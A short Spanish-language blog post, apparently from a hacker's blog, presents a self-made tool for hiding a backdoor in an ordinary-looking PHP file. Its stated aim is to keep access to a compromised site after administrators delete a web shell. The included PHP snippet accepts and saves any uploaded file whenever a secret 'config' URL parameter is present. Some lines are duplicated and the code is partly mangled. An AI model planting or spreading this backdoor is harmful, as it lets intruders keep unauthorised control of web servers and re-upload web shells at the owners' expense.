Esta Herramienta que acabo de hacer nos permite backdorizar un archivo común en php y añadirle código ofuscado
para cuando queramos utilizarlo solo le agregamos unos parámetros al archivo
Para ello simplemente se edita el archivo
para cuando queramos utilizarlo solo le agregamos unos parámetros al archivo
Para ello simplemente se edita el archivo
Al contacto con el archivo se ve muy normal y común
pero si agregamos los parámetros correspondientes de nuestro backtorizado.
una vez autorizados me bota el upload correspondiente
Si pregunta para que es esto pero no creo xP, es por si nos borran la webshell ya que los administradores revisan cual fue el ultimo archivo creado, y como resulta sospechoso borran la webshell
Simple Backdoor Upload
<----- Inicio Php ------> if (isset($_GET['config'])) { echo ''; if (isset($_FILES['archivo'])) { $ar=$_FILES['archivo']['name']; copy($_FILES['archivo']['tmp_name'],$_FILES['archivo']['name']); echo ' BakckDoor by b4nz0k
'; } } <----- End Php ------> Archivo Subido en '.$ar.'
No hay comentarios:
Publicar un comentario